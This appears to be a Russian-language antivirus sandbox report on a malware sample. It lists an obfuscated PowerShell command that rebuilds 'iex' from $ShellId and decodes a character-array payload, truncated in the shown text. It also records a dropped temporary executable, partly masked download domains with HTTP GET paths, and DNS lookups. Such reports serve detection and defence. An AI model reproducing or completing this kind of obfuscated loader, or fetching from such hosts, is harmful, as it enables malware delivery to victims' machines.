Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' & ( $SHeLLid[1]+$shElLId[13]+'x') ( ( [ChAR[]]( 28,87 ,111 ,104 , 109 ,78, 115, 24, 5,24,86, 93 , 79, 21,87, 90, 82 , 93, 91, 76 , 24,74 , 89,86, 92, 87 ,85,3, 28, 82,84,112, 87, 76,24,5,24 ,86...
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\4017.exe
Удаляет следующие файлы
- %TEMP%\4017.exe
Сетевая активность
Подключается к
- 'go###obalert.in':80
- 'vi####nlondon.com':80
- 'mi####ncaravan.com':80
TCP
Запросы HTTP GET
- http://www.go###obalert.in/p0mouWC/
- http://vi####nlondon.com/F7eBpe/
- http://www.mi####ncaravan.com/ZmrSZekKX/
- http://mi####ncaravan.com/ZmrSZekKX/
UDP
- DNS ASK an####amshop.com
- DNS ASK go###obalert.in
- DNS ASK vi####nlondon.com
- DNS ASK mi####ncaravan.com
- DNS ASK sh##ji.org
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' & ( $SHeLLid[1]+$shElLId[13]+'x') ( ( [ChAR[]]( 28,87 ,111 ,104 , 109 ,78, 115, 24, 5,24,86, 93 , 79, 21,87, 90, 82 , 93, 91, 76 , 24,74 , 89,86, 92, 87 ,85,3, 28, 82,84,112, 87, 76,24,5,24 ,86...' (со скрытым окном)
